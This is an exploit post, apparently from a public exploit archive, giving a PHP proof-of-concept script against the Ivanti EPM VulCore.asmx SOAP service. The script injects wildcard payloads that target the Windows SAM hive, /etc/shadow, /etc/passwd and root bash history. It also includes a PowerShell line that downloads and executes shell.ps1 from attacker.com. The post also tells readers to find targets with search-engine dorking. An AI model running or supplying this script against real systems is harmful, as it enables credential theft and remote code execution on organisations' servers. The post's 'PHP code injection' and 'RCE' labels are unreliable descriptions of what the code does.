=============================================================================================================================================
| # Title     : Ivanti EPM v1.0 PHP Code Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://forums.ivanti.com/s/article/Security-Advisory-EPM-January-2025-for-EPM-2024-and-EPM-2022-SU6?language=en_US         |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code contains : exploit a vulnerable web service that processes requests via SOAP. to RCE command execution vulnerabilities. 
 
[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php -u <URL> -t <TARGET> -p <PAYLOAD_TYPE>\nAvailable payloads: default, sam, secret, powershell, linux_passwd, linux_shadow, linux_bash_history

[+] Change the target link of the two lines = 9 + 27

[+] PayLoad :

<?php

function exploit($url, $relay_target, $payload_type) {
    $payloads = [
        "default" => "\\$relay_target\\tmp\\file1.txt",
        "sam" => "\\$relay_target\\C$\\Windows\\System32\\config\\SAM",
        "secret" => "\\$relay_target\\C$\\Users\\Public\\secret.txt",
        "powershell" => "powershell.exe -Command \"IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/shell.ps1')\"",
        "linux_passwd" => "/etc/passwd",
        "linux_shadow" => "/etc/shadow",
        "linux_bash_history" => "/root/.bash_history"
    ];
    
    $wildcard = $payloads[$payload_type] ?? $payloads["default"];
    
    $xml_payload = <<<XML
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <GetHashForWildcardRecursive xmlns="http://tempuri.org/">
            <wildcard>$wildcard</wildcard> 
        </GetHashForWildcardRecursive>
    </soap:Body>
</soap:Envelope>
XML;
    
    $headers = [
        "Content-Type: text/xml",
        "Soapaction: http://tempuri.org/GetHashForWildcardRecursive"
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url/WSVulnerabilityCore/VulCore.asmx");
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $xml_payload);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    echo $response . "\n";
    echo "HTTP Status Code: " . $http_code . "\n";
}

$options = getopt("u:t:p:", ["url:", "target:", "payload:"]);
if (!isset($options['u']) || !isset($options['t'])) {
    die("Usage: php script.php -u <URL> -t <TARGET> -p <PAYLOAD_TYPE>\nAvailable payloads: default, sam, secret, powershell, linux_passwd, linux_shadow, linux_bash_history\n");
}

$payload_type = $options['p'] ?? "default";
exploit($options['u'], $options['t'], $payload_type);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================